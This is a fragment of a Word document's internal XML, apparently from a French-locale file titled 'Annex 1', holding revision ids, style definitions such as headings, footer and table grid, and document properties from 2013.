    <w:rsid w:val="0024453C"/>
    <w:rsid w:val="00251D9A"/>
    <w:rsid w:val="00260C2E"/>
    <w:rsid w:val="002679FD"/>
    <w:rsid w:val="002727C8"/>
    <w:rsid w:val="00283B63"/>
    <w:rsid w:val="00285E8B"/>
    <w:rsid w:val="00287EAF"/>
    <w:rsid w:val="00290979"/>
    <w:rsid w:val="002952C8"/>
    <w:rsid w:val="00296AB6"/>
    <w:rsid w:val="00297479"/>
    <w:rsid w:val="002B37BF"/>
    <w:rsid w:val="002B4145"/>
    <w:rsid w:val="002B4E81"/>
    <w:rsid w:val="002C4E80"/>
    <w:rsid w:val="002D337C"/>
    <w:rsid w:val="002E07EC"/>
    <w:rsid w:val="002E152D"/>
    <w:rsid w:val="002F0CB0"/>
    <w:rsid w:val="002F4D13"/>
    <w:rsid w:val="00301CCB"/>
    <w:rsid w:val="00306D8C"/>
    <w:rsid w:val="00306FD9"/>
    <w:rsid w:val="00311C7C"/>
    <w:rsid w:val="00312435"/>
    <w:rsid w:val="00313596"/>
    <w:rsid w:val="003151AD"/>
    <w:rsid w:val="00315631"/>
    <w:rsid w:val="00331692"/>
    <w:rsid w:val="003323B2"/>
    <w:rsid w:val="00332D84"/>
    <w:rsid w:val="0033325D"/>
    <w:rsid w:val="00341258"/>
    <w:rsid w:val="00347FAE"/>
    <w:rsid w:val="00350DB7"/>
    <w:rsid w:val="00351A4C"/>
    <w:rsid w:val="00362AA5"/>
    <w:rsid w:val="00370052"/>
    <w:rsid w:val="0038527F"/>
    <w:rsid w:val="0038563D"/>
    <w:rsid w:val="003867A2"/>
    <w:rsid w:val="00387D38"/>
    <w:rsid w:val="00394694"/>
    <w:rsid w:val="00394801"/>
    <w:rsid w:val="003965BA"/>
    <w:rsid w:val="00396C5C"/>
    <w:rsid w:val="003A33DC"/>
    <w:rsid w:val="003B4296"/>
    <w:rsid w:val="003C016A"/>
    <w:rsid w:val="003C3D10"/>
    <w:rsid w:val="003C4578"/>
    <w:rsid w:val="003C4BAD"/>
    <w:rsid w:val="003D23EE"/>
    <w:rsid w:val="003D498E"/>
    <w:rsid w:val="003D5938"/>
    <w:rsid w:val="003D7008"/>
    <w:rsid w:val="003E3005"/>
    <w:rsid w:val="003E3BEB"/>
    <w:rsid w:val="003E4F3E"/>
    <w:rsid w:val="003F08CC"/>
    <w:rsid w:val="003F785A"/>
    <w:rsid w:val="003F78F2"/>
    <w:rsid w:val="00401394"/>
    <w:rsid w:val="00401C83"/>
    <w:rsid w:val="00401FF8"/>
    <w:rsid w:val="00403117"/>
    <w:rsid w:val="00405DAC"/>
    <w:rsid w:val="00430875"/>
    <w:rsid w:val="00434510"/>
    <w:rsid w:val="004345E7"/>
    <w:rsid w:val="00441909"/>
    <w:rsid w:val="00451651"/>
    <w:rsid w:val="00451913"/>
    <w:rsid w:val="00453016"/>
    <w:rsid w:val="00464E24"/>
    <w:rsid w:val="00483D00"/>
    <w:rsid w:val="00484F61"/>
    <w:rsid w:val="004861A6"/>
    <w:rsid w:val="0048707E"/>
    <w:rsid w:val="00487122"/>
    <w:rsid w:val="004A3E60"/>
    <w:rsid w:val="004A6240"/>
    <w:rsid w:val="004A6BDF"/>
    <w:rsid w:val="004B0C56"/>
    <w:rsid w:val="004B2AC2"/>
    <w:rsid w:val="004B3FA0"/>
    <w:rsid w:val="004B7550"/>
    <w:rsid w:val="004B7FC7"/>
    <w:rsid w:val="004C0DC6"/>
    <w:rsid w:val="004D173F"/>
    <w:rsid w:val="004D532A"/>
    <w:rsid w:val="004D57C1"/>
    <w:rsid w:val="004D6FF4"/>
    <w:rsid w:val="004E0A70"/>
    <w:rsid w:val="004E3248"/>
    <w:rsid w:val="004E54AC"/>
    <w:rsid w:val="004E5D3F"/>
    <w:rsid w:val="004F27F6"/>
    <w:rsid w:val="004F5566"/>
    <w:rsid w:val="004F619F"/>
    <w:rsid w:val="00505DE6"/>
    <w:rsid w:val="005178EB"/>
    <w:rsid w:val="00523CBF"/>
    <w:rsid w:val="005246CF"/>
    <w:rsid w:val="00526169"/>
    <w:rsid w:val="00530991"/>
    <w:rsid w:val="0053170F"/>
    <w:rsid w:val="00531E00"/>
    <w:rsid w:val="00534F71"/>
    <w:rsid w:val="00535FE8"/>
    <w:rsid w:val="0053685C"/>
    <w:rsid w:val="00537494"/>
    <w:rsid w:val="00545C45"/>
    <w:rsid w:val="00564178"/>
    <w:rsid w:val="00574398"/>
    <w:rsid w:val="005841EE"/>
    <w:rsid w:val="00586A71"/>
    <w:rsid w:val="005946B0"/>
    <w:rsid w:val="005A3FA5"/>
    <w:rsid w:val="005A41D9"/>
    <w:rsid w:val="005A7E2B"/>
    <w:rsid w:val="005B1E5E"/>
    <w:rsid w:val="005C09DB"/>
    <w:rsid w:val="005C620E"/>
    <w:rsid w:val="005D331D"/>
    <w:rsid w:val="005D3D1B"/>
    <w:rsid w:val="005E27DF"/>
    <w:rsid w:val="005E3BF0"/>
    <w:rsid w:val="005F07D4"/>
    <w:rsid w:val="005F381B"/>
    <w:rsid w:val="005F77C9"/>
    <w:rsid w:val="00602022"/>
    <w:rsid w:val="00603951"/>
    <w:rsid w:val="0060615C"/>
    <w:rsid w:val="0061787F"/>
    <w:rsid w:val="00620FAF"/>
    <w:rsid w:val="00635405"/>
    <w:rsid w:val="006360EA"/>
    <w:rsid w:val="00637B4C"/>
    <w:rsid w:val="00643938"/>
    <w:rsid w:val="00652235"/>
    <w:rsid w:val="006541B8"/>
    <w:rsid w:val="00654532"/>
    <w:rsid w:val="00654F2E"/>
    <w:rsid w:val="00660181"/>
    <w:rsid w:val="0066463A"/>
    <w:rsid w:val="00666D33"/>
    <w:rsid w:val="00674536"/>
    <w:rsid w:val="00681919"/>
    <w:rsid w:val="006823F6"/>
    <w:rsid w:val="00682560"/>
    <w:rsid w:val="006833CA"/>
    <w:rsid w:val="00684897"/>
    <w:rsid w:val="00687BCC"/>
    <w:rsid w:val="006903B3"/>
    <w:rsid w:val="00693FC9"/>
    <w:rsid w:val="00694115"/>
    <w:rsid w:val="0069741F"/>
    <w:rsid w:val="006A1534"/>
    <w:rsid w:val="006A3C77"/>
    <w:rsid w:val="006B7D5B"/>
    <w:rsid w:val="006C5629"/>
    <w:rsid w:val="006C6AD7"/>
    <w:rsid w:val="006D1F70"/>
    <w:rsid w:val="006D47EF"/>
    <w:rsid w:val="006F4148"/>
    <w:rsid w:val="007033DF"/>
    <w:rsid w:val="00703722"/>
    <w:rsid w:val="007049A7"/>
    <w:rsid w:val="0070647A"/>
    <w:rsid w:val="00710E40"/>
    <w:rsid w:val="00723445"/>
    <w:rsid w:val="00724FCF"/>
    <w:rsid w:val="0073348A"/>
    <w:rsid w:val="00737DD5"/>
    <w:rsid w:val="00744068"/>
    <w:rsid w:val="00744E13"/>
    <w:rsid w:val="0074549D"/>
    <w:rsid w:val="0075362B"/>
    <w:rsid w:val="00757174"/>
    <w:rsid w:val="00770242"/>
    <w:rsid w:val="00771DAB"/>
    <w:rsid w:val="00774E27"/>
    <w:rsid w:val="00776AA7"/>
    <w:rsid w:val="00780A29"/>
    <w:rsid w:val="007837EC"/>
    <w:rsid w:val="007876E2"/>
    <w:rsid w:val="0079691C"/>
    <w:rsid w:val="007A436B"/>
    <w:rsid w:val="007A574C"/>
    <w:rsid w:val="007A6207"/>
    <w:rsid w:val="007C4AEE"/>
    <w:rsid w:val="007D0C42"/>
    <w:rsid w:val="007D35FA"/>
    <w:rsid w:val="007D3A8C"/>
    <w:rsid w:val="007E2109"/>
    <w:rsid w:val="007E49B7"/>
    <w:rsid w:val="007F7091"/>
    <w:rsid w:val="008133AA"/>
    <w:rsid w:val="00813CC3"/>
    <w:rsid w:val="00814B52"/>
    <w:rsid w:val="00815089"/>
    <w:rsid w:val="0082200C"/>
    <w:rsid w:val="0084296B"/>
    <w:rsid w:val="00843466"/>
    <w:rsid w:val="008459CD"/>
    <w:rsid w:val="00854AB2"/>
    <w:rsid w:val="00864506"/>
    <w:rsid w:val="00865C76"/>
    <w:rsid w:val="00872F0B"/>
    <w:rsid w:val="008813B0"/>
    <w:rsid w:val="0088194D"/>
    <w:rsid w:val="008829E7"/>
    <w:rsid w:val="008837D0"/>
    <w:rsid w:val="00883C2C"/>
    <w:rsid w:val="008912BB"/>
    <w:rsid w:val="008914BF"/>
    <w:rsid w:val="00896725"/>
    <w:rsid w:val="008B1751"/>
    <w:rsid w:val="008B27EB"/>
    <w:rsid w:val="008C04E1"/>
    <w:rsid w:val="008D3970"/>
    <w:rsid w:val="008D3E2C"/>
    <w:rsid w:val="008E38C4"/>
    <w:rsid w:val="008F18E9"/>
    <w:rsid w:val="008F4255"/>
    <w:rsid w:val="00900CA7"/>
    <w:rsid w:val="009026B0"/>
    <w:rsid w:val="009029B9"/>
    <w:rsid w:val="009079D3"/>
    <w:rsid w:val="00907E63"/>
    <w:rsid w:val="00910CF9"/>
    <w:rsid w:val="00912B4C"/>
    <w:rsid w:val="0091462D"/>
    <w:rsid w:val="00920C51"/>
    <w:rsid w:val="00927991"/>
    <w:rsid w:val="00933134"/>
    <w:rsid w:val="00963430"/>
    <w:rsid w:val="009668B0"/>
    <w:rsid w:val="00970708"/>
    <w:rsid w:val="00977374"/>
    <w:rsid w:val="00980468"/>
    <w:rsid w:val="0098249D"/>
    <w:rsid w:val="00982A06"/>
    <w:rsid w:val="00982B10"/>
    <w:rsid w:val="009B1DCD"/>
    <w:rsid w:val="009B2B80"/>
    <w:rsid w:val="009B4E07"/>
    <w:rsid w:val="009B7122"/>
    <w:rsid w:val="009D0007"/>
    <w:rsid w:val="009D1DA3"/>
    <w:rsid w:val="009D4728"/>
    <w:rsid w:val="009E13EB"/>
    <w:rsid w:val="009F072E"/>
    <w:rsid w:val="009F23E8"/>
    <w:rsid w:val="00A04D94"/>
    <w:rsid w:val="00A05C41"/>
    <w:rsid w:val="00A12E6F"/>
    <w:rsid w:val="00A13258"/>
    <w:rsid w:val="00A132A2"/>
    <w:rsid w:val="00A33D83"/>
    <w:rsid w:val="00A35012"/>
    <w:rsid w:val="00A352B3"/>
    <w:rsid w:val="00A44733"/>
    <w:rsid w:val="00A569DD"/>
    <w:rsid w:val="00A57252"/>
    <w:rsid w:val="00A611F1"/>
    <w:rsid w:val="00A629DF"/>
    <w:rsid w:val="00A738B8"/>
    <w:rsid w:val="00A75FAC"/>
    <w:rsid w:val="00A772E0"/>
    <w:rsid w:val="00A773B8"/>
    <w:rsid w:val="00A774C4"/>
    <w:rsid w:val="00A8240C"/>
    <w:rsid w:val="00A833DF"/>
    <w:rsid w:val="00A918E0"/>
    <w:rsid w:val="00A939B6"/>
    <w:rsid w:val="00AA1C0E"/>
    <w:rsid w:val="00AC4C55"/>
    <w:rsid w:val="00AC5458"/>
    <w:rsid w:val="00AD094F"/>
    <w:rsid w:val="00AD4140"/>
    <w:rsid w:val="00AD7216"/>
    <w:rsid w:val="00AF64EB"/>
    <w:rsid w:val="00B1322F"/>
    <w:rsid w:val="00B201C3"/>
    <w:rsid w:val="00B2205B"/>
    <w:rsid w:val="00B234F2"/>
    <w:rsid w:val="00B24860"/>
    <w:rsid w:val="00B31268"/>
    <w:rsid w:val="00B35438"/>
    <w:rsid w:val="00B4174A"/>
    <w:rsid w:val="00B42E36"/>
    <w:rsid w:val="00B4632B"/>
    <w:rsid w:val="00B477A6"/>
    <w:rsid w:val="00B53431"/>
    <w:rsid w:val="00B538EC"/>
    <w:rsid w:val="00B57403"/>
    <w:rsid w:val="00B578B5"/>
    <w:rsid w:val="00B60630"/>
    <w:rsid w:val="00B643D2"/>
    <w:rsid w:val="00B72B02"/>
    <w:rsid w:val="00B72DB3"/>
    <w:rsid w:val="00B939C6"/>
    <w:rsid w:val="00B952F6"/>
    <w:rsid w:val="00BA3143"/>
    <w:rsid w:val="00BA7CCC"/>
    <w:rsid w:val="00BB6569"/>
    <w:rsid w:val="00BC65B1"/>
    <w:rsid w:val="00BD6D15"/>
    <w:rsid w:val="00BE6CA2"/>
    <w:rsid w:val="00BE79FC"/>
    <w:rsid w:val="00BF0664"/>
    <w:rsid w:val="00BF30FA"/>
    <w:rsid w:val="00BF414A"/>
    <w:rsid w:val="00BF513B"/>
    <w:rsid w:val="00BF6F1F"/>
    <w:rsid w:val="00C01678"/>
    <w:rsid w:val="00C03BA3"/>
    <w:rsid w:val="00C042D8"/>
    <w:rsid w:val="00C12398"/>
    <w:rsid w:val="00C203D0"/>
    <w:rsid w:val="00C33A23"/>
    <w:rsid w:val="00C405B0"/>
    <w:rsid w:val="00C62476"/>
    <w:rsid w:val="00C63499"/>
    <w:rsid w:val="00C656F1"/>
    <w:rsid w:val="00C66961"/>
    <w:rsid w:val="00C744E0"/>
    <w:rsid w:val="00C84C77"/>
    <w:rsid w:val="00C94F2A"/>
    <w:rsid w:val="00CA0FB3"/>
    <w:rsid w:val="00CC2614"/>
    <w:rsid w:val="00CD4FF6"/>
    <w:rsid w:val="00CD534D"/>
    <w:rsid w:val="00CD647A"/>
    <w:rsid w:val="00CE1C5D"/>
    <w:rsid w:val="00CE1FCF"/>
    <w:rsid w:val="00CE7EE1"/>
    <w:rsid w:val="00CF0E97"/>
    <w:rsid w:val="00D00312"/>
    <w:rsid w:val="00D01247"/>
    <w:rsid w:val="00D01B57"/>
    <w:rsid w:val="00D04423"/>
    <w:rsid w:val="00D05FD5"/>
    <w:rsid w:val="00D14F02"/>
    <w:rsid w:val="00D1527C"/>
    <w:rsid w:val="00D2631B"/>
    <w:rsid w:val="00D275AB"/>
    <w:rsid w:val="00D31557"/>
    <w:rsid w:val="00D37639"/>
    <w:rsid w:val="00D4503E"/>
    <w:rsid w:val="00D46913"/>
    <w:rsid w:val="00D5363F"/>
    <w:rsid w:val="00D54364"/>
    <w:rsid w:val="00D56903"/>
    <w:rsid w:val="00D61891"/>
    <w:rsid w:val="00D61F96"/>
    <w:rsid w:val="00D666EE"/>
    <w:rsid w:val="00D71E78"/>
    <w:rsid w:val="00D738AC"/>
    <w:rsid w:val="00D74554"/>
    <w:rsid w:val="00D81050"/>
    <w:rsid w:val="00D8626D"/>
    <w:rsid w:val="00D866CB"/>
    <w:rsid w:val="00D87957"/>
    <w:rsid w:val="00D94452"/>
    <w:rsid w:val="00DA49AE"/>
    <w:rsid w:val="00DA4FE4"/>
    <w:rsid w:val="00DA5F45"/>
    <w:rsid w:val="00DB4584"/>
    <w:rsid w:val="00DB669D"/>
    <w:rsid w:val="00DC5BF4"/>
    <w:rsid w:val="00DD42D8"/>
    <w:rsid w:val="00DD5F83"/>
    <w:rsid w:val="00DE46D0"/>
    <w:rsid w:val="00DE6CEB"/>
    <w:rsid w:val="00DF0153"/>
    <w:rsid w:val="00DF3D4D"/>
    <w:rsid w:val="00DF53D4"/>
    <w:rsid w:val="00E0568F"/>
    <w:rsid w:val="00E06AE1"/>
    <w:rsid w:val="00E130DA"/>
    <w:rsid w:val="00E14352"/>
    <w:rsid w:val="00E14D89"/>
    <w:rsid w:val="00E32BB4"/>
    <w:rsid w:val="00E41C1A"/>
    <w:rsid w:val="00E44395"/>
    <w:rsid w:val="00E47577"/>
    <w:rsid w:val="00E508A2"/>
    <w:rsid w:val="00E52883"/>
    <w:rsid w:val="00E57C72"/>
    <w:rsid w:val="00E76A9A"/>
    <w:rsid w:val="00E80F9C"/>
    <w:rsid w:val="00E81F69"/>
    <w:rsid w:val="00E84239"/>
    <w:rsid w:val="00E863A7"/>
    <w:rsid w:val="00E8672D"/>
    <w:rsid w:val="00E91D03"/>
    <w:rsid w:val="00E927D3"/>
    <w:rsid w:val="00E97D6F"/>
    <w:rsid w:val="00EA7C30"/>
    <w:rsid w:val="00EB27D3"/>
    <w:rsid w:val="00EC1D90"/>
    <w:rsid w:val="00EC629C"/>
    <w:rsid w:val="00EC649E"/>
    <w:rsid w:val="00EC7E65"/>
    <w:rsid w:val="00ED1693"/>
    <w:rsid w:val="00ED7D14"/>
    <w:rsid w:val="00EE1A50"/>
    <w:rsid w:val="00EE6518"/>
    <w:rsid w:val="00EF5EE6"/>
    <w:rsid w:val="00EF7F60"/>
    <w:rsid w:val="00F04CE8"/>
    <w:rsid w:val="00F05525"/>
    <w:rsid w:val="00F11BEE"/>
    <w:rsid w:val="00F122B8"/>
    <w:rsid w:val="00F17965"/>
    <w:rsid w:val="00F22353"/>
    <w:rsid w:val="00F22A48"/>
    <w:rsid w:val="00F23898"/>
    <w:rsid w:val="00F27C4C"/>
    <w:rsid w:val="00F30142"/>
    <w:rsid w:val="00F43AE8"/>
    <w:rsid w:val="00F61AC2"/>
    <w:rsid w:val="00F64E9B"/>
    <w:rsid w:val="00F807C8"/>
    <w:rsid w:val="00F8552E"/>
    <w:rsid w:val="00F85C09"/>
    <w:rsid w:val="00F85DF5"/>
    <w:rsid w:val="00F96A1A"/>
    <w:rsid w:val="00FA2187"/>
    <w:rsid w:val="00FA3C56"/>
    <w:rsid w:val="00FA6495"/>
    <w:rsid w:val="00FB681C"/>
    <w:rsid w:val="00FB7D18"/>
    <w:rsid w:val="00FC03D3"/>
    <w:rsid w:val="00FC1EB7"/>
    <w:rsid w:val="00FC473D"/>
    <w:rsid w:val="00FD3509"/>
    <w:rsid w:val="00FD3B9C"/>
    <w:rsid w:val="00FE08F2"/>
    <w:rsid w:val="00FE55F0"/>
    <w:rsid w:val="00FE5E12"/>
    <w:rsid w:val="00FE6344"/>
    <w:rsid w:val="00FE7D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Connecteur droit avec flèche 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43D2"/>
    <w:pPr>
      <w:bidi/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Titre2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Titre2Car"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="00297479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39480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8829E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BA314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A3143"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Pieddepage">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PieddepageCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA314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A3143"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Textedebulles">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TextedebullesCar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00BA3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A3143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4D532A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E0568F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itre2Car">
    <w:name w:val="Titre 2 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre2"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00297479"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="36"/>
      <w:szCs w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grilleclaire-Accent1">
    <w:name w:val="Light Grid Accent 1"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="62"/>
    <w:rsid w:val="0029747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character" w:customStyle="1" w:styleId="Titre3Car">
    <w:name w:val="Titre 3 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00394801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styleId="lev">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00394801"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="PrformatHTML">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="PrformatHTMLCar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0039480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rsid w:val="00394801"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Accentuation">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:uiPriority w:val="20"/>
    <w:qFormat/>
    <w:rsid w:val="00394801"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="Grilledutableau">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableauNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00CD53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re4Car">
    <w:name w:val="Titre 4 Car"/>
    <w:basedOn w:val="Policepardfaut"/>
    <w:link w:val="Titre4"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="008829E7"/>
    <w:rPr>
      <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:i/>
      <w:iCs/>
      <w:color w:val="5B9BD5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64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7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9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9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2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0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5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4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8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3D3A85-70AC-4C4D-A3A5-81D571FC4D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1003</TotalTime>
  <Pages>10</Pages>
  <Words>1869</Words>
  <Characters>10280</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>85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Annex 1</vt:lpstr>
      <vt:lpstr>Annex 1</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12125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Annex 1</dc:title>
  <dc:creator>warda</dc:creator>
  <cp:lastModifiedBy>admin</cp:lastModifiedBy>
  <cp:revision>292</cp:revision>
  <cp:lastPrinted>2013-06-24T00:15:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2013-06-02T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2013-04-13T22:03:00Z</dcterms:modified>
</cp:coreProperties>
</file>